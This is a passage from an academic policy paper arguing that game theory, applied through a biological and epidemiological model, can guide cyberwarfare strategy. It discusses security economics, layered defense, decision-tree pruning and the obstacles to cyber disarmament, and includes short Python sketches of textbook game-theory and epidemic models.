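For contrast with the cyber case, the minimax computation that is unavailable in cyberwar is straightforward for a small, fully specified game. The sketch below uses the standard closed form for 2x2 zero-sum games (textbook material, not drawn from the cited sources; the matching-pennies payoffs are illustrative):

```python
def solve_2x2_zero_sum(a):
    """Minimax (Nash) solution of a 2x2 zero-sum game.

    a[i][j] is the row player's payoff when row plays i, column plays j.
    Returns (game value, row player's probability of playing row 0).
    """
    (a11, a12), (a21, a22) = a
    # Saddle-point check: a pure-strategy equilibrium exists when the
    # row player's best guaranteed payoff equals the column player's.
    maximin = max(min(a11, a12), min(a21, a22))
    minimax = min(max(a11, a21), max(a12, a22))
    if maximin == minimax:
        return maximin, (1.0 if min(a11, a12) >= min(a21, a22) else 0.0)
    # Otherwise both players mix: standard closed form for 2x2 games.
    denom = a11 - a12 - a21 + a22
    p = (a22 - a21) / denom
    value = (a11 * a22 - a12 * a21) / denom
    return value, p

# Matching pennies: no saddle point, so both players mix 50/50
# and the value of the game is 0.
print(solve_2x2_zero_sum([[1, -1], [-1, 1]]))  # -> (0.0, 0.5)
```

Every assumption this sketch depends on — known payoffs, two players, alternating structure, a fixed endpoint — is one the surrounding paragraph shows to be violated in cyberwarfare.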

Moreover, the possibility of alliances disrupts Nash equilibrium because if players can agree on<br />

strategies different from minimax, they may achieve higher payouts. The classic example of this is a<br />

cartel manipulating the market; in the cyber realm, it could take the form of international or even<br />

non-nation-state collaboration among players. U.S. vulnerability to alliance-making by other players is<br />

accentuated by the fact that we have more to lose— our government and our private-sector cyber<br />

capabilities/ data are overall more valuable than other countries' (Hathaway, 2009:16).<br />

Some, including former Department of Homeland Security Secretary Michael Chertoff (in Espiner<br />

2010) compare nuclear strategy to cyber strategy. However, cyber weapons defy nuclear game<br />

theoretic strategy because cyber weapons are amorphous and can be pinpointed— used as a scalpel<br />

instead of, or as well as, a hammer. Even cyber weapons that are clearly war-oriented, like Stuxnet,<br />

can be more controlled and monitored in use than nuclear weapons, may take time to detect and may<br />

cover the executor’s tracks. Unlike the nuclear arena, in which even those with capabilities have so far<br />

resisted employing nuclear weapons, cyberwar weapons have been and will continue to actually<br />

come into use—but in nuanced and creative ways that elude traditional definitions of use of force,<br />

weapons, or war.<br />

For all these reasons, it seems likely that we cannot use game theory in the traditional method of<br />

modeling the game’s endpoints and then reversing the moves that would lead to stasis, because we<br />

may never reach equilibrium. This is another way of saying that the game may have multiple Nash<br />

equilibria-- “Game theory cannot necessarily predict the outcome of a game if there are more than<br />

one Nash equilibriums [sic] for the game. Especially when a game has multiple Nash equilibriums [sic]<br />

with conflicting payoffs...” (Jamakka et al., 2005: 14). If the parties do not reach stasis then by<br />

definition the game will continue because players have an incentive to change their decision--it is only<br />

at equilibrium that (optimal payout exists and therefore) there is no incentive to change decisions.<br />

Accordingly, this paper’s analysis begins from an acknowledgment that in cyberwar, there may be no<br />

“solution.” In cyberwar, unlike in checkers, game theory cannot follow each decision path to its<br />

conclusion and then trace the right decisions back. The “right decisions” may evolve and the endpoint,<br />

if there is one, is unknown. However, game theory continues to be useful in cyberwar strategy<br />

because the rational predictability of game theory will continue to drive decisions and seek out<br />

patterns in them, and because game theory may identify and intelligently weight nodes of a decision<br />

tree that are not immediately recognizable or historically favored by human decision-makers.<br />
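The idea of identifying and weighting decision-tree nodes can be made concrete with a small expectiminimax sketch: one side's nodes maximize, the other side's minimize, and chance nodes weight their children by probability. The tree below is invented purely for illustration, not a model of any real scenario:

```python
def evaluate(node):
    """Value a decision tree whose interior nodes are ('max', children),
    ('min', children) or ('chance', [(prob, child), ...]) and whose
    leaves are numeric payoffs."""
    if isinstance(node, (int, float)):
        return node
    kind, children = node
    if kind == 'max':    # one side picks its best branch
        return max(evaluate(c) for c in children)
    if kind == 'min':    # the other side picks its least-bad branch
        return min(evaluate(c) for c in children)
    # chance node: weight each branch by its probability
    return sum(p * evaluate(c) for p, c in children)

# Invented toy tree (payoffs to the maximizing side): the minimizer
# chooses between a certain outcome and a branch whose value depends
# on chance and on the maximizer's later reply.
tree = ('min', [
    ('chance', [(0.3, ('max', [10, 4])), (0.7, 2)]),
    5,
])
print(evaluate(tree))  # -> ~4.4 (0.3 * 10 + 0.7 * 2)
```

The point of such a calculation is not the toy numbers but the mechanism: a chance node's weighted value can favor a branch that an unaided human, anchored on the worst case, would not pick.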

The paper begins by acknowledging a number of ways in which cyberwar defies traditional game<br />

theory models. It describes why a biological model is the most useful analogy, including the<br />

epidemiological response to invasion and the evolutionary tendency toward equilibrium. Then it<br />

explores the benefits of game theory, describing ways in which it is a uniquely useful tool for<br />

cyberwarfare strategy as an ongoing set of decisions in a changing set of conditions.<br />



3. Limits to using game theory<br />

3.1 The economics of cyber insecurity<br />


Game theoretical explorations assume perfect rationality, but economically, there are a number of<br />

ways in which the current cybersecurity system lacks the incentives to operate at what might be<br />

termed “rational” full strength. One is the problem of externalities-- like air pollution, most individuals<br />

underinvest in their own security out of a perception that the problem (and its solution) does not target<br />

them directly. (Anderson and Moore 2006). This emerges in many contexts where vulnerabilities are<br />

not clearly attributable to the responsible actor; Daniel Geer, Chief Information Security Officer of the<br />

Central Intelligence Agency’s venture capital fund In-Q-Tel (2010), drew a comparison to the<br />

evolution of laws that would enforce responsibility for cleaning up a toxic waste spill and dealing with<br />

those affected by it. Personal underinvestment in security means vulnerability to botnet appropriation<br />

of computers, as well as facilitation of anonymity-inducing programs like Tor, which allow a hacker to<br />

stage a virtually untraceable attack. (See, e.g., Wilson 2008). The number of computers under remote botnet control<br />

is growing at an average of 378% each year, according to grassroots security monitoring<br />

organization Project Honey Pot; this translates to ease of launching distributed denial-of-service (DDoS) attacks<br />

and decreased likelihood of tracing an attack. The DDoS attacks—both against Wikileaks (Carney<br />

2010) and against its detractors (Reuters 2010)—made use of those who passively or voluntarily<br />

submitted their computers to botnet control.<br />
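The underinvestment externality described above can be illustrated with a toy two-player security-investment game (the payoff numbers are invented): each unit of investment benefits both players, but only its buyer pays, so free riding is individually dominant even though mutual investment is socially better.

```python
def utility(my_invest, other_invest, benefit=3, cost=4):
    """One player's payoff: security is shared (an externality),
    but each player pays only for their own units."""
    return benefit * (my_invest + other_invest) - cost * my_invest

# Not investing dominates, since the private benefit of a unit (3)
# is below its private cost (4)...
for other in (0, 1):
    assert utility(0, other) > utility(1, other)

# ...yet the joint benefit of a unit (6) exceeds its cost (4), so the
# all-invest outcome beats the no-invest Nash outcome for everyone.
print(utility(1, 1), utility(0, 0))  # -> 2 0
```

This is the formal shape of the air-pollution analogy: the rational-player assumption holds, yet the equilibrium leaves every machine underprotected.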

Internet founder Vint Cerf (in Schofield, 2008) made the Hobbesian observation that “[i]t seems every<br />

machine has to defend itself. The Internet was designed that way. It’s every man for himself.” The<br />

Internet may require individuals to self-protect, but it wasn’t “designed” for individuals to take the reins<br />

in security—it was simply not designed for security. It is designed, to the extent that one can say it<br />

was designed, for openness. Security may fall to individuals but the current structure doesn’t provide<br />

the necessary incentives for them to make that investment. Game theoretical assumptions about<br />

rationality are thrown off by the human tendency to underinvest when there are externalities. As<br />

software engineer Brad Shapcott famously said, “The Internet isn’t free. It just has an economy that<br />

makes no sense to capitalism.”<br />

Re-aligning incentives to prioritize an optimal level of individual cybersecurity investment is an<br />

economics task, but no one has ownership of the problem or the impetus to even get robust<br />

information about it. As Jonathan Zittrain (Harvard Law 2010) stated, “Because no one owns this<br />

problem, no one is paying for monitoring software to get the picture they need, to be accurate.”<br />

By contrast, in the private sector economic objectives often reward security—such as the case study<br />

of the US banking industry compared with the UK banking industry. In US bank security, credit card<br />

fraud has been the responsibility of the bank. UK banks initially refused responsibility for ATM error,<br />

and it created a “moral hazard” incentive for bank employees to act carelessly. (Anderson and Moore<br />

2006: 610-613).<br />

On a higher level of abstraction, there are externalities because of government reliance on private<br />

sector cybersecurity technology. When this reliance couples with any tolerance for inefficiency, such<br />

as those that result from revolving door corruption or transparency concerns, it constricts the<br />

competitiveness of government contract assignment. This produces high-level inefficiencies. (See<br />

Baram 2009). According to a study by the Center for Public Integrity, only about one-third of Pentagon<br />

contracts were awarded following competition between two or more bidders. (Calbreath 2005). The<br />

cost premium of outsourcing defense contracts to private sector providers is only justified by the<br />

innovation push that the private sector is assumed to have; if government-to-company contracts are<br />

instead funneled through sole-source contracts, this innovation advantage assumption may not be<br />

valid, and the price premium may not be justified (see Arnold et al., 2009: 25). Small levels of<br />

distorted investment can produce large results in absolute terms because the numbers are so large:<br />

the total investment in research, development, test and evaluation (RDT&E) and procurement funds<br />

for the DoD major defense acquisitions portfolio is a staggering $1.6 trillion (GAO Report 2009).<br />

3.2 Imperfect competition and the investment-to-security payout<br />

Companies are moved by (and have a legal fiduciary duty to prioritize) their own bottom line; there is<br />

no independent incentive to collaborate toward producing high-quality security products. Thus at the<br />

federal level, great dependency on private contractors in the cyber weapons arena can distort cost<br />

efficiency calculations in game theory. Our investment in security may not lead linearly to a<br />

higher-security end-result, as is presumed by security-investment-level calculations. See, e.g., Schavland,<br />

Chan and Raines (2009:629): “Our model places a dollar valuation on the insurance we are willing to<br />

purchase for information security." Yet the assumption of a linear connection between investment and<br />

security is generally inaccurate. Karen Evans, Administrator for Electronic Government and Information<br />

Technology, Office of Management and Budget (2007), emphasized in a statement to a congressional<br />

subcommittee that when it comes to e-security, neither high spending nor high regulatory compliance<br />

translates directly to actual higher security.<br />
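
The non-linear relationship between spending and security can be made concrete with a toy model.<br />

The sketch below assumes a hypothetical breach-probability function that decays exponentially with<br />

investment; the function and its parameters are illustrative, not drawn from any of the cited studies.<br />

```python
import math

def breach_probability(investment, baseline=0.5, efficacy=0.001):
    # Hypothetical, illustrative model: breach risk decays
    # exponentially with security spend (in dollars).
    return baseline * math.exp(-efficacy * investment)

# Diminishing returns: the first $1,000 of spending removes far more
# risk than the second $1,000 does.
first_cut = breach_probability(0) - breach_probability(1000)
second_cut = breach_probability(1000) - breach_probability(2000)
assert first_cut > second_cut
```

Under any such concave model, equal increments of spending buy ever-smaller reductions in risk,<br />

which is one reason high spending does not translate directly to high security.<br />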

Because of the private sector's lack of incentives to collaborate, coupled with private companies'<br />

incentives not to divulge information about breaches (see, e.g., Gal-Or and Ghose 2004), there is an<br />

opacity around cybersecurity vulnerabilities that can produce misinformation. For instance, there<br />

has been a longstanding assumption that cyberattackers exploit unpatched computers after the<br />

patch has been released; Internet security expert Eric Rescorla (2004) has even argued against<br />

disclosure and frequent patching for this reason. However, the latest Verizon data breach report does<br />

not support this: “In the past we have discussed a decreasing number of attacks that exploit software<br />

or system vulnerabilities versus those that exploit configuration weaknesses or functionality…[This<br />

year] there wasn't a single confirmed intrusion that exploited a patchable vulnerability” (2010: 29). In<br />

other words, as Verizon's 2009 report stated, “vulnerabilities are certainly a problem contributing to<br />

data breaches but patching faster is not the solution” (2009: 18).<br />

Another concrete instance of misinformation is the “60 Minutes” segment (2009) that claimed<br />

that the Brazilian power grid was taken down by hackers. While the video was widely accepted and<br />

generated apocalyptic fears, Bob Giesler, Vice President for Cyber Programs at SAIC, soon declared<br />

the video to be “part of the dialogue that is absolutely wrong. The Brazilian powergrid dropped<br />

because of poor and faulty maintenance.” Giesler was corroborated when Wired Magazine (2009)<br />

reported that there had been an investigation, and the blackout was “actually the result of a utility<br />

company's negligent maintenance of high voltage insulators on two transmission lines.”<br />

Misinformation about our cyber nemeses obscures analysis of policy needs and threat prioritization.<br />

Game theory cannot apply efficiently when we miscalculate or fail to identify those against whom we<br />

are playing.<br />

4. Moving from a linear to a biological model<br />

High reliance on the private sector for cyber development means the DoD must use a customer-driven<br />

intelligence model, identifying needs and contracting for them. Yet competition for contracts does not<br />

occur in a perfectly competitive environment, and reliance upon it incorrectly presumes that the<br />

government has perfect information about its own needs and the risks of disclosing them. Umehara<br />

and Ohta (2009: 323) model transparency as a zero-sum game, and “assume that when a<br />

government agency makes a decision it knows the total amount of the potential damage." We may<br />

need to reevaluate the customer-driven intelligence model to find ways to harness more of the<br />

brainpower that exists not only in the private sector but also within the nonprofit, academic, and<br />

government domains—such as the working group that came together to face the Conficker worm<br />

challenge (See Moscaritolo 2009).<br />

Similarly, there are “weapons” confronting the DoD in the cyber arena that do not come from<br />

traditional or foreign enemies, such as the Wikileaks disclosures. As Giesler (2009) phrased it, “The<br />

challenge to the government is: how do you harness that decentralized, netcentric organism? How do<br />

you enable the ecosystem's antibodies to react to these things as opposed to regulating and breaking<br />

it down? How do you nurture that reaction?” This decentralized power emerged in the response to<br />

Pakistan blocking YouTube; as Jonathan Zittrain (2009) reminds us, this was a crisis to which NANOG,<br />

“an informal network of nerds, some of whom work for various ISPs,” promptly responded.<br />

Cyberwar strategy requires us to think outside of a linear security-investment frame of mind toward<br />

weapons development. The most accurate model of cyber threat appears to be one that is biological—<br />

specifically, one that is epidemiological—in its response to invasion. In the case of the Estonian<br />

cyberattacks, Giesler (2009) offers as an example, “it was the banking sector, it was the telco sector that<br />

responded,” and “I started to think ‘Maybe that's the right model. This stuff is so decentralized, the<br />

problem is so pervasive and so fast…how you organize around a problem will dictate how you solve it<br />

and it requires a lot more dialogue.'” The Department of Defense has recognized this interweaving of<br />

capabilities and data, and issued the somewhat oblique statement, “We are in the Age of<br />

Interdependence, out of the Information Age” (DoD 2009 Vision Conference).<br />

Effective cyberintrusion defenses mirror the epidemiological model for responding to an invader.<br />

Some have warned of a “cyber Pearl Harbor”; this seems too rooted in the kinetic world to form an<br />

accurate description of the threat. As Giesler asserts, we ought to be talking about cyber-destruction<br />

like a cancer—“you already have it, it's hard to detect, it may be fatal but it's also treatable.” It may be<br />

that the best responses to cyberwar are not found by studying war—at least not the wars in our history<br />

books involving cannons or tanks.<br />
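
The epidemiological framing can be sketched numerically. Below is a minimal discrete-time SIR<br />

(susceptible/infected/recovered) model applied to a population of hosts; the infection and cleanup<br />

rates are invented for illustration, not fitted to any real malware outbreak.<br />

```python
def sir_step(s, i, r, beta=0.3, gamma=0.1):
    # One time step: beta is the contact/infection rate,
    # gamma the cleanup (patch/disinfect) rate.
    new_infections = beta * s * i
    recoveries = gamma * i
    return s - new_infections, i + new_infections - recoveries, r + recoveries

s, i, r = 0.99, 0.01, 0.0        # fractions of all hosts
for _ in range(200):
    s, i, r = sir_step(s, i, r)
# The outbreak peaks and then subsides on its own, with most hosts
# having passed through the infected state.
```

In this frame, defensive policy acts on the parameters: faster cleanup raises gamma, segmentation<br />

lowers beta, and the problem becomes epidemic control rather than battlefield victory.<br />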

Similarly, rather than a process of continual growth, cyber evolution, like biological evolution, seems<br />

more aptly characterized as punctuated equilibrium—fairly long periods of relative stasis followed by<br />

quick, drastic periods of breakthrough. (An example of a breakthrough in the cyber context could be<br />

the advent of cloud computing.) Correspondingly, one of the reasons why reaching Nash equilibrium<br />

is unlikely in the cyberwar context is that under unstable conditions, evolutionarily stable strategies<br />

don't run a typical course. As evolutionary biologist Klaus Rohde (2005: Appendix 3) writes, “frequent<br />

and drastic abiotic and biotic changes in the environment which affect the fitness (reproductive<br />

success) of potential contestants in evolutionary ‘games,' will make it more difficult to establish<br />

evolutionary stable strategies, because the establishment of an ESS cannot keep up with the<br />

changes.” Because cyber evolution is not linear but organic, it forces us to treat it according to the<br />

economics of biology. The DNI's “Vision 2015” report addresses the deliverables aspect of this: “We<br />

cannot evolve into the next technology ‘S curve' incrementally; we need a revolutionary approach.<br />

Breakthrough innovation, disruptive technologies, and rapid transition to end-users will be required…”<br />
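
Rohde's point about rapid change destabilizing an ESS can be illustrated with the textbook<br />

Hawk-Dove game, in which the stable mix of aggressive and passive strategies is V/C (resource value<br />

over fight cost). The numbers below are hypothetical; the sketch only shows that when the landscape<br />

shifts, the equilibrium the population was converging toward moves with it.<br />

```python
def ess_hawk_fraction(v, c):
    # Classic Hawk-Dove result: with fight cost c exceeding resource
    # value v, the evolutionarily stable hawk fraction is v / c;
    # if v >= c, pure hawk is stable.
    return min(1.0, v / c)

stable_mix = ess_hawk_fraction(2, 10)   # 0.2: mostly posturing
shocked_mix = ess_hawk_fraction(8, 10)  # 0.8: same game, higher stakes
```

If the environment (v, c) changes faster than strategies can adjust, the population is chasing a moving<br />

target—the analogue of Rohde's claim that an ESS cannot establish itself under rapid change.<br />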

Applying game theory to cyberwarfare strategy allows us to make predictions that transcend lockstep<br />

models, that change based on resources, and that take into account other players' strategies and<br />

environmental conditions. Thus, while game theory offers neither a solution nor an accurate map of<br />

potential moves, it nonetheless seems to be our best tool for transcending the perpetual reactiveness<br />

that has characterized cyber and information security efforts.<br />

5. Uses of game theory<br />

5.1 Layered defense<br />

While cyberwar strategy is a game of imperfect information, there are always choices available, and<br />

the vulnerabilities associated with each choice are not random but are often knowable or predictable,<br />

at least to some extent. We know that the risks of using open-source materials lie in their lack of<br />

restriction; we know that the weaknesses that come from use of highly classified, air-gapped (or, in<br />

Zittrain-speak, “tethered”) networks come from a loss of functionality and “generativity.” Diversity and<br />

interoperability are tradeoffs, as are embrittlement and toughening. These are zero-sum games; but<br />

the overall strategy is not. While one cannot create a network that is maximally resistant to both<br />

random faults and targeted faults, one can take into account the particular weaknesses and<br />

likelihoods of attack so that the weaknesses overlap in resistant ways, ways that correspond to<br />

risk preferences and security priorities. As the banking and credit card systems have worked to create<br />

overall robustness through non-overlapping weaknesses, other providers (including infrastructure<br />

providers) could create calculated layers of defense, given coordination and appropriate<br />

budgeting.<br />
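
A minimal way to formalize weaknesses "overlapping in resistant ways" is to represent each defensive<br />

layer by the set of attack classes it fails to stop: an attack succeeds only against a weakness shared<br />

by every layer. The attack-class labels below are hypothetical.<br />

```python
def shared_weaknesses(layers):
    # Attack classes that defeat every layer at once; defense-in-depth
    # is strongest when this intersection is empty.
    return set.intersection(*layers)

# Hypothetical failure sets per layer (attack classes each layer misses):
overlapping = [{"phishing", "zero_day"}, {"phishing", "insider"}]
layered = [{"phishing", "zero_day"}, {"insider", "ddos"}]

shared_weaknesses(overlapping)  # {'phishing'}: one attack pierces both layers
shared_weaknesses(layered)      # set(): no single attack class defeats both
```

Choosing layers so that their failure sets are disjoint is itself a coordination and budgeting problem,<br />

which is why the strategy must reflect risk preferences and security priorities.<br />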

5.2 Identifying nodes robustly<br />

In game-theoretic search, narrowing the set of choices worth evaluating is accomplished through<br />

alpha-beta pruning: there is not an unlimited number of desirable outcomes, and therefore not an<br />

unlimited number of choices worth exploring, so one can prune down the number of nodes evaluated<br />

in the search tree. Alpha-beta pruning exploits the fact that as soon as one move can be proven less<br />

desirable than another, it need not be further evaluated. One's search can then steer toward the more<br />

promising subtree(s), creating an optimal search path.<br />
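
The pruning idea described above can be shown in a minimal implementation over a game tree<br />

written as nested lists (leaves are payoffs). This is the standard textbook algorithm, not anything<br />

specific to the cyber domain.<br />

```python
def alphabeta(node, alpha, beta, maximizing):
    # As soon as a move is provably worse than an already-examined
    # alternative (alpha >= beta), the rest of its subtree is skipped.
    if isinstance(node, (int, float)):   # leaf node: payoff
        return node
    if maximizing:
        value = float("-inf")
        for child in node:
            value = max(value, alphabeta(child, alpha, beta, False))
            alpha = max(alpha, value)
            if alpha >= beta:
                break                    # prune remaining children
        return value
    value = float("inf")
    for child in node:
        value = min(value, alphabeta(child, alpha, beta, True))
        beta = min(beta, value)
        if alpha >= beta:
            break
    return value

tree = [[3, 5], [2, 9]]  # two moves, each with two possible replies
alphabeta(tree, float("-inf"), float("inf"), True)  # 3; the 9-leaf is never examined
```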

To do this effectively first requires diversity and creativity—that is, the ability to identify many possible<br />

nodes. Defense Secretary Robert Gates stated that the Pentagon is “desperately short of people who<br />

have capabilities (defensive and offensive cybersecurity war skills) in all the services and we have to<br />

address it” (Booz Allen 2009: 1). The key human-side aspect of cyberwar strategy is to effectively<br />

uncover all possible decision paths, which requires, foundationally, that the Department of Defense do<br />

a more effective job of recruiting and retaining diverse talent.<br />

Identifying new nodes also requires a model that takes into account the creative possibilities that exist<br />

in the cyber world (which do not exist as concretely in, for example, the nuclear world) for moves that<br />

serve what biological models call “posturing”— flexing muscles to show capability rather than to enact<br />

any immediate goal. Species which posture rather than fight tend to compete via a “war of attrition.”<br />

Applying this to international security reveals that there are more available cyberwar decision paths<br />

than those which enact straightforward violence. As Rohde (2010) stated, taking into account<br />

posturing is useful because it accounts for different forms of power on the changing landscape in<br />

which the competition occurs. Rohde explains, “Climate change, for example, may have unforeseen<br />

consequences for how nations behave: a war of attrition may become more aggressive.” This game<br />

cannot be modeled linearly based on how many cannons or bombs a country has stockpiled; actual<br />

capabilities may be lesser or greater than those the country chooses to display. (See, e.g., Woodward<br />

2010 on the “speculative” possibility that Stuxnet was an Israeli attack on an Iranian target.) Cyberwar<br />

posturing requires a model more nuanced than M.A.D. To fully exploit the potential for modeling game<br />

theoretical strategies, we must recruit diverse minds to think up new possible nodes, and validate<br />

different forms of power to determine what strategies serve the end goal.<br />

5.3 Weighting nodes intelligently<br />

Once one isolates the problem and defines the corresponding set of goals in a given situation, one<br />

must evaluate the other players‟ likely moves. Game theory can play an important role at this stage<br />

because it is well-established that human cognition tends not to react to threats in a fully rational way,<br />

or as economics would dictate. Jonathan Renshon and Nobel Prize winner Daniel Kahneman have<br />

written on these human cognitive obstacles to economically-optimal decisions. According to<br />

Kahneman and Renshon (2006), “humans cannot make the rational calculations required by<br />

conventional economics. They rather tend to take mental shortcuts that may lead to erroneous<br />

predictions, i.e., they are biased.” Using game theory to make a security strategy that is a calculated<br />

derivative of mapped potential outcomes allows decisionmakers to lessen those biases and respond<br />

to threats proportionately and economically.<br />

The fact that there are limited existing examples of cyberwarfare interactions complicates this stage of<br />

analysis—successful programming in games like chess and Othello has relied upon finite patterns of<br />

previous actions: “A hill climbing algorithm can… be used based on a function of the number of<br />

correct opponent move predictions taken from a list of previous opponent moves or games” (Hamilton<br />

et al., 2002: 4). Lack of behavioral precedent models will increase the margin of error—if one could<br />

use a killer heuristic (prioritizing moves that have been shown to produce cutoffs in other situations),<br />

the pruning would be more successful (Winands 2004). It is possible that red-teaming could provide<br />

some approximations of history—indeed, one of the recommendations in the Report of the Defense<br />

Science Board (2010: viii) is to “establish red teaming as the norm instead of the exception.” And all<br />

players must play on the board of limited empirical history.<br />
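
The value of move ordering such as the killer heuristic can be seen by counting how much of the tree<br />

alpha-beta search actually visits. The instrumented search below is a generic sketch: examining a<br />

strong move first produces cutoffs sooner and so evaluates fewer positions.<br />

```python
def search(node, alpha, beta, maximizing, stats):
    # Alpha-beta search that counts evaluated leaves.
    if isinstance(node, (int, float)):
        stats["leaves"] += 1
        return node
    value = float("-inf") if maximizing else float("inf")
    for child in node:
        v = search(child, alpha, beta, not maximizing, stats)
        if maximizing:
            value, alpha = max(value, v), max(alpha, v)
        else:
            value, beta = min(value, v), min(beta, v)
        if alpha >= beta:
            break  # cutoff: remaining moves are never examined
    return value

# The same game, with the strongest first move tried first vs. last:
good, bad = [[3, 5], [2, 9]], [[2, 9], [3, 5]]
g_stats, b_stats = {"leaves": 0}, {"leaves": 0}
search(good, float("-inf"), float("inf"), True, g_stats)
search(bad, float("-inf"), float("inf"), True, b_stats)
# g_stats["leaves"] < b_stats["leaves"]: better ordering, more pruning
```

A real engine records moves that caused cutoffs at the same depth (“killer moves”) and tries them<br />

first, which is exactly the behavioral-precedent advantage the cyber domain lacks.<br />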

In an intersecting sense, using game theory to assign weight neutrally to the nodes of a decision<br />

tree may be especially useful in the cyber context because our reactions seem to derive from<br />

evolutionary strategies, and cyber may activate those uniquely. Having a "face" to the threat is crucial<br />

to our reaction, according to psychologist Daniel Gilbert (2007), who offers as an example that global<br />

warming does not push our buttons the way terrorism and other threats "with a mustache" do (think of<br />

the resources we devote to deaths by terrorism, compared to deaths by cancer or hunger). Cyberwar<br />

has a sanitized quality to it—unlike bombs and tanks, it does not necessitate face-to-face<br />

confrontation with the effects of one's decisions (see Baer 2010b).<br />

6. Avoiding cyberwar: Could we have cyber disarmament?<br />

The economic inefficiencies of an offensive cyber arms race (not to mention the danger of allowing<br />

the US and others to stockpile a cyber arsenal) have led some to propose solutions to avoid this<br />

altogether. Harvard Professor Jack Goldsmith (2010) has proposed something akin to an international<br />

negotiating architecture to preempt cyberwar and the costs of cyberdefense. Certainly, the U.S. would<br />

benefit from having red lines drawn. But even if we could have the prescience to create a sense of<br />

rules that would anticipate the new ways in which the Internet will be useful for attack (which is<br />

unlikely given the range of possibilities, many of which might not be directly violent— “the range of<br />

possible options is very large, so that cyberattack-based operations might be set in motion to<br />

influence an election, instigate conflict between political factions, harass disfavored leaders or entities,<br />

or divert money.”-- National Research Council Committee on Offensive Information Warfare Section<br />

28


Merritt Baer<br />

1.5), there seems to be no way to guarantee China‟s (or North Korea‟s or Russia‟s) compliance<br />

unless there are some enforcement machineries, and some remedies in instances of transgression.<br />

Cheating seems almost assured considering that, for instance, North Korea continually reneges on its<br />

nuclear negotiations, and cyber disarmament would be pragmatically much easier to cheat.<br />

Even if we could get a global cyber-enforcement organization in place, cyber attribution problems<br />

would allow for rogue states (let alone non-nation-state actors which have no real duty to comply and<br />

are harder to retaliate against) to act outside the rules. Defectors could gain a comparative<br />

advantage by cheating (think of the classic prisoners' dilemma, in which defecting is always the<br />

individually optimal strategy even though it doesn't produce the optimal outcome overall), and could<br />

do it remotely through US computers, as in the Estonia attack. Making a disarmament agreement<br />

enforceable would require a change in the Internet architecture that decreases anonymity, or some<br />

other sea change to incentivize compliance. One could impose sanctions on nations that allow attacks<br />

to happen, but this strict liability regime would confront practical problems: finding accurate attribution<br />

is difficult and, in fact, the latest numbers reflect more botnet-appropriated computers in the U.S. than<br />

anywhere else (Prince 2010). Establishing cyber rules and then being unable to enforce them<br />

because of attribution problems could be embarrassing.<br />
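
The defection logic invoked above is easy to make explicit. With the standard (and here hypothetical)<br />

prisoners'-dilemma payoffs below, defecting is the best reply to either move by the other player, yet<br />

mutual defection leaves both worse off than mutual cooperation.<br />

```python
# Row player's payoff (higher is better) for (my_move, their_move).
PAYOFF = {
    ("cooperate", "cooperate"): 3,
    ("cooperate", "defect"): 0,
    ("defect", "cooperate"): 5,
    ("defect", "defect"): 1,
}

def best_reply(their_move):
    # Pick whichever of our moves maximizes our own payoff.
    return max(("cooperate", "defect"),
               key=lambda mine: PAYOFF[(mine, their_move)])

best_reply("cooperate")  # 'defect' (5 beats 3)
best_reply("defect")     # 'defect' (1 beats 0)
# ...yet (defect, defect) pays (1, 1), worse for both than (3, 3).
```

A treaty without enforcement changes none of these payoffs, which is why the comparative<br />

advantage of cheating persists.<br />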

Moreover, like nuclear war game theory, cyberwar game theory decision paths are complicated by the<br />

fact that there are differences in risk tolerance among players. Thus, while “the usual assumption is<br />

that an opponent evaluation function uses a subset of the heuristics in our own evaluation function,<br />

with different weights” (Hamilton et al. 2002: 4), the heuristics of cyber players may vary dramatically,<br />

especially in interactions between countries whose governments have markedly different risk<br />

tolerances. Since “players' decisions are optimally based not only on their own cost functions (which<br />

each knows) but also on their opponent's cost structure (which is known only in probability)”<br />

(McCormick and Owen 2006), we cannot assume that our incentives for desiring disarmament match<br />

other players'.<br />

Larger values-based issues require us to evaluate what kind of behavior we find acceptable online<br />

and what is a violation of international ethics or human rights. This is part of a dialogue that needs to<br />

occur before a legal framework can enforce it. As I have written, we all have a stake in this<br />

determination (Baer 2010a). The focus of this paper, however, has been the strategic possibilities,<br />

not the broader development of a code of human rights online.<br />

7. Conclusions<br />

Game theory is not a panacea. As I have described, cyberwarfare defies a number of common game<br />

theoretic assumptions. However, it is worth exploring game theory's applications to cyberwarfare<br />

strategy because game theory lends itself to viewing larger patterns, and approaching problems<br />

holistically. In cyber, the lines between fighting and research melt away, and the computer scientists<br />

mobilizing the tools to wage cyberwar look more like Mozart or Einstein than Napoleon. Following the<br />

symmetries that occur in the natural world, the responses of epidemiology and the growth patterns of<br />

evolutionary biology, game theory allows us to gauge efficacy in a non-linear dimension. Many<br />

experts have compared cyberwar strategy to kinetic-world models, from nuclear strategy (Chertoff, in<br />

Espiner 2010) to air warfare strategy (Baker 2010). I find that kinetic-world models of warfare fall short<br />

of describing the problem of cyberwarfare or its possible treatments. There is no real winning in<br />

cyberwar; there is continual reorientation.<br />

Game theory, worked upon a biological model, holds promise for cyberwar strategy because it<br />

transcends linear models that assume aspects of the landscape to be fixed. Cyberwarfare is delicate<br />

but not haphazard, and game theory can guide decisions that address true threats by avoiding human<br />

bias. If we maintain a robust workforce, game theory can also allow decisionmakers to identify<br />

emerging nodes on the decision tree. In an Occam's razor sense, it may be that to anticipate the curve<br />

in the cyberwarfare game, we ought to return to the simple beauty of early programming, when the<br />

Internet was unmolded, an organic cell of potential energy. Cyber development eludes kinetic-world<br />

models because it is not just about harnessing power, it is about creating new pockets of utility and<br />

exploiting them in creative ways.<br />

Acknowledgements<br />

Thanks to Professor Jack Goldsmith for the opportunity to write a first version of this research in<br />

seminar and for the exposure to many of cyberwarfare's leading minds.<br />


References<br />

Anderson, R. and Moore, T. (2006) “The Economics of Information Security,” Science Vol. 314 No. 5799, pp.<br />

610-613.<br />

Arnold, S. A., et al. (2009) "Can Profit Policy and Contract Incentives Improve Defense Contract Outcomes?"<br />

Institute for Defense Analyses, Washington, DC.<br />

Baer, M. (2010a) “Cyberstalking, and the Internet Landscape We Have Constructed.” Virginia Journal of Law and<br />

Technology 154 Vol. 15, No. 2.<br />

-- (2010b) “Cyber Attacks & the Ethical Dimension of the Google China Episode,” [online], Global Comment,<br />

http://globalcomment.com/2010/cyber-attacks-the-ethical-dimension-of-the-google-china-episode/<br />

Baker, S. (2010) “Cyberwar: What is it Good For?” ABA 20th Annual Review of the Field of National Security Law,<br />

Washington, DC.<br />

Baram, M. (2009) “Wasteful Spending by Private Contractors in Afghanistan Climbs to $1 Billion, as their<br />

Numbers Multiply,” Huffington Post.<br />

Booz Allen Hamilton (2009) “Cyber In-Security: Strengthening the Federal Cybersecurity Workforce,” [online],<br />

